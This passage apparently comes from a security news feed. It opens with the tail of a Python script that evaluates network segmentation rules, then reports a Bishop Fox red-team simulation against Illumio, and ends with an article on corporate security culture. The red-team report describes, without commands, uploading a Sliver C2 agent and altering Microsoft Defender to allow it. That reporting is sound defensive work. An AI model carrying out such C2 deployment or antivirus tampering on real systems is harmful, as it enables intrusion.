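        # Entry point for the attacker: RDP to API workloads in Corporate only.
        return f.dst_env == "corporate" and f.dst_role == "api" and f.service == RDP
    if f.src_env not in ENVIRONMENTS:
        return False
    if f.dst_env == "internet":
        return f.service in INTERNET_EGRESS
    if f.src_role == "jump" and f.service == RDP:
        # Corporate jump host -> Staging, Staging jump host -> Production.
        return (f.src_env, f.dst_env) in {("corporate", "staging"),
                                          ("staging", "production")}
    return False


def is_allowed(f: Flow) -> bool:
    """Deny by default: shared services first, then explicit denies, then allows."""
    if shared_service(f):
        return True
    if denied(f):
        return False
    return allowed_by_rule(f)


def evaluate(flows) -> dict:
    """Map each flow to its verdict, e.g. when reviewing a proposed policy."""
    return {f: is_allowed(f) for f in flows}


if __name__ == "__main__":
    # Constructed sample flows echoing the narrative: the attacker's RDP entry
    # is permitted, but lateral RDP from an API workload into Staging is not.
    for f in (Flow("internet", "any", "corporate", "api", "tcp", 3389),
              Flow("corporate", "api", "staging", "web", "tcp", 3389)):
        print(f, "->", "ALLOW" if is_allowed(f) else "DENY")
```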

The red team, simulating the attack, started by connecting to corp-win-serv-0 using the CORPADMIN account. The team then uploaded a Sliver agent to C:\ProgramData\Amazon and executed it. Once Microsoft Defender detected the initial payload, the team modified Defender to allow the binary and re-executed the payload.

“After waiting several minutes for a C2 callback and fallback connection methods to execute, the red team still had no established session with the Sliver agent, indicating additional segmentation had been enforced,” the report explained.

The red team continued its methodology without a C2 agent and began local host enumeration, using a Windows command prompt to list running processes.

The team continued the discovery process and identified the password policies in place, along with local user accounts on the machine, before losing the RDP session due to blue team countermeasures. The entire simulation ended 10 minutes after it started.

The Importance of Real Threat Simulations

The Bishop Fox assessment of Illumio revealed in detail how running simulation attacks can enlighten the industry on the capabilities of zero trust segmentation.

However, the assessment did have some limitations:

  • The number of and style of attacks evaluated was limited.
  • The technical settings and rules of the attacks, the environment, and the microsegmentation policies were fixed in advance.
  • The environment representing hosts was a Windows-only environment.
  • Only two Bishop Fox consultants engaged in the simulations: One acting as the attacker (red team) and the other acting as the security team defending the system (blue team).

Despite these limitations, the assessment is a big step in the right direction. Putting zero-trust security to the test with real attack simulations is often considered the ultimate cybersecurity defense.

These simulations can help organizations stay one step ahead of cyber criminals. Running simulated attacks can level-up security as malware evolves and the attack surface expands with the never-ending digital transformation.

Read next: Zero Trust: Hype vs. Reality

Cybersecurity Training and Tech Aren’t Enough; ‘Culture Change’ Needed https://www.esecurityplanet.com/trends/cybersecurity-culture-change-needed/ Mon, 08 Aug 2022 14:38:59 +0000

Companies spend a staggering amount of money on cybersecurity products to defend their networks and data from hackers, but a couple of industry pros say that money is wasted if companies don’t change their internal cybersecurity culture.

In September 2021, Cybersecurity Ventures anticipated in a report that the total global cybersecurity spending would exceed a staggering $1.75 trillion by 2025. The report projected another year of growth in investment for the sector, this time at 15%.

Companies continue to invest in protecting their increasingly digitalized business assets. From Internet of Things (IoT) devices to the cloud and hybrid work endpoints, cybersecurity spending has also grown and shifted since COVID-19 changed the way the world works.

“In 2004, the global cybersecurity market was worth just $3.5 billion,” said Steve Morgan, founder of Cybersecurity Ventures. “Now it’s one of the largest and fastest-growing sectors in the information economy.”

Security executives have been adding features focusing on zero-trust technology, automation, responsive SOAR platforms, secure access service edge (SASE) models, and deception technology, among others.

But that technology can at best limit damage if the human element doesn’t improve.

Also read: Best Cybersecurity Awareness Training for Employees

The Key to Cyber Defense is Security Culture

PwC’s 2022 Global Digital Trust Insights report reveals that the spending trend for cybersecurity shows no signs of slowing down. In fact, 69% of surveyed organizations predict an increase in their security spending for 2022.

But two veteran security experts, Peter Carpenter and Kai Roer, at employee cybersecurity training leader KnowBe4 say business leaders are overlooking a hacker’s primary way into a system: vulnerable and exploitable human workers. They say that the best defense against cyber threats is in an organization’s security culture.

Their latest book, The Security Culture Playbook: An Executive Guide to Reducing Risk and Developing Your Human Defense Layer, combines the insight of 35 years of security culture experience with data-driven insights from over 40,000 global organizations. They believe that promoting security awareness isn’t enough; organizations must “bake security into their culture.”

Carpenter spoke to eSecurity Planet about the importance of a strong security culture. Carpenter said organizations have become experts in technology-based security tactics such as firewalls, email gateways, endpoint protection, and more. However, despite advanced defenses, organizations still face massive data breach problems.

“Technology-based defenses have made it so difficult to hack into organizations that cybercriminals are increasingly turning to social engineering (tricking humans) to accomplish their goals,” Carpenter said.

The industry has to direct as much effort into preparing human-based defenses as they have their technology defenses. Carpenter’s recommendation is to put more intentional time, effort, and investment into building this layer of defense.

“This means focusing on our cybersecurity ABCs: awareness, behavior, and culture,” Carpenter said.

Improving Cybersecurity Communication and Metrics

Carpenter revealed a simple formula that describes the basic flow of executive communication and is designed to improve every cybersecurity message. It all starts with the information that creates a narrative or story. The story is vital for workers to identify with the issues. This way they will remember concepts better.

“The person sharing information needs to find ways to connect the information to something bigger, broader, and more emotional than simple facts and figures,” Carpenter said.

The formula is:

Information → Story/Narrative → Transparency and Metrics → Insight and Direction.

In this formula, facts, figures, and supporting details should only be introduced in ways that support the broader story. It is also of vital importance, when introducing metrics, to interpret them transparently, clearly, and honestly. Metrics in cybersecurity and security culture can be victories, stumbling blocks, or challenges that move the story from one point of the plot to another. This is where insight and direction come into play.

Measuring the security culture of an organization is increasingly important to gain a 360-degree view of the company’s strong and weak points. Carpenter’s method of gauging security culture goes well beyond others, measuring seven dimensions through technical and scientific approaches.

“We break security culture into seven distinct, measurable dimensions. They are: attitudes, behaviors, cognition, communication, compliance, norms, and responsibilities,” Carpenter explained.

Each one of the dimensions can be measured by direct observation or by looking at evidence or data. One of the methods used is their proprietary Security Culture Survey. The survey includes a set of scientifically based questions that are designed to get to the heart of each of the seven dimensions.

“One of the secrets to getting accurate answers in a survey like this is that we don’t ask someone what their specific behavior or understanding is; instead, we ask them how they perceive other people or groups in their organization,” Carpenter said, adding that such indirect questions invite greater honesty.

The benefit of measuring the security culture of an organization in seven dimensions is it provides a much more detailed view of the issues that need to be addressed. Additionally, each dimension has a gravitational effect on the others. If an organization focuses on improving one or two dimensions, the others are expected to improve as well.

Protecting Your Data Through a Strong Security Culture

For years, technology-based tactics have been preached as the ultimate defense against cyberattacks. However, a Verizon report reveals that 82% of all breaches are linked to the human element. Organizations will continue to be exposed to attacks—no matter how strong their cyber defenses are—because sophisticated cyber criminals today are targeting the weakest links of a system: its workforce. These weak links can only be strengthened by strengthening the security culture.

Read next: Top Cybersecurity Companies for 2022
